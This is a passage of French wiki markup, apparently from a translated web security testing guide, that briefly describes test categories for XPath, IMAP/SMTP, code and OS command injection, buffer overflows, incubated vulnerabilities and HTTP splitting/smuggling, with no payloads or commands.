'''[[Tester les injections XPath (OTG-INPVAL-010) |4.8.10 XPath Injection (OTG-INPVAL-010)]]<br>'''<br />
XPath est un langage d'adressage de documents XML. Les tests d'injection XPath visent à vérifier s'il est possible d'injecter des données dans une application et de les exécuter comme des requêtes XPath contrôlées par l'utilisateur. Exploitée avec succès, cette vulnérabilité permet à un attaquant de contourner les mécanismes d'authentification, ou d'accéder à des informations sans autorisation.<br><br />
<br />
<br />
'''[[Tester les injections IMAP/SMTP (OTG-INPVAL-011)|4.8.11 IMAP/SMTP Injection (OTG-INPVAL-011)]]<br>'''<br />
Cette menace touche toutes les applications qui communiques avec des serveurs email (IMAP/SMTP), le plus souvent les applications webmail. Les tests d'injection IMAP/SMTP visent à vérifier s'il est possible d'injecter des commandes IMAP/SMTP arbitraires dans les serveurs email, grâce à un manque de validation des entrées.<br><br />
Une attaque par injection IMAP/SMTP casse le schéma suivant :<br><br />
Entrée -> commande IMAP/SMTP == Injection IMAP/SMTP<br><br />
<br />
<br />
'''[[Tester les injections de code (OTG-INPVAL-012)|4.8.12 Code Injection (OTG-INPVAL-012)]]<br>'''<br />
Les tests dinjection de code vérifient s'il est possible d'injecter des données dans une application qui seront plus tard exécutées par le serveur web.<br><br />
Une injection de code casse le schéma suivant :<br><br />
Entrée -> Code malicieux == Injection de Code<br><br />
<br />
<br />
'''[[Tester les injections de commandes (OTG-INPVAL-013)|4.8.13 OS Commanding (OTG-INPVAL-013)]]<br>'''<br />
Les testeurs vont essayer d'injecter dans l'application des commandes systèmes via une requête HTTP.<br><br />
Une injection de commande casse le schéma suivant :<br><br />
Entrée -> Commande Système == Injection de commande système<br><br />
<br />
<br />
'''[[Testet les dépassement de tampons (Buffer Overflow) (OTG-INPVAL-014)|4.8.14 Buffer overflow (OTG-INPVAL-014)]]<br>'''<br />
Les testeurs vont vérifier différents type de vulnérabilités de dépassement de tampon. Voici les méthodes pour les types courants :<br><br />
[[Tester les dépassement de tas (Heap Overflow) |4.8.14.1 Heap overflow ]]<br><br />
[[Tester les dépassement de pile (Stack Overflow) |4.8.14.2 Stack overflow ]]<br><br />
[[Tester les formats de chaînes (Format String) |4.8.14.3 Format string ]]<br><br />
<br />
En général, un dépassement de tampon casse le schéma suivant :<br><br />
Entrée -> tampon fixe ou format de chaîne == Dépassement<br><br />
<br />
<br />
'''[[Tester les Incubated Vulnerability (OTG-INPVAL-015) |4.8.15 Incubated vulnerability (OTG-INPVAL-015)]] <br>'''<br />
Les tests Incubated sont des tests complexes, nécessitant plus d'une vulnérabilité de validation pour fonctionner.<br><br />
<br />
<br />
[[Tester les HTTP Splitting/Smuggling (OTG-INPVAL-016)|4.8.16 Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)]]<br><br />
Cette section décrit les tests d'exploitation HTTP, comme les HTTP Verb, HTTP Splitting, HTTP Smuggling.<br />
<br />
<br />
Dans tous les schémas montrés plus haut, les données doivent être validées par l'application avant d'être utilisées. Le but des tests est de vérifier si l'application vérifie efficacement ses entrées.</div>Thofer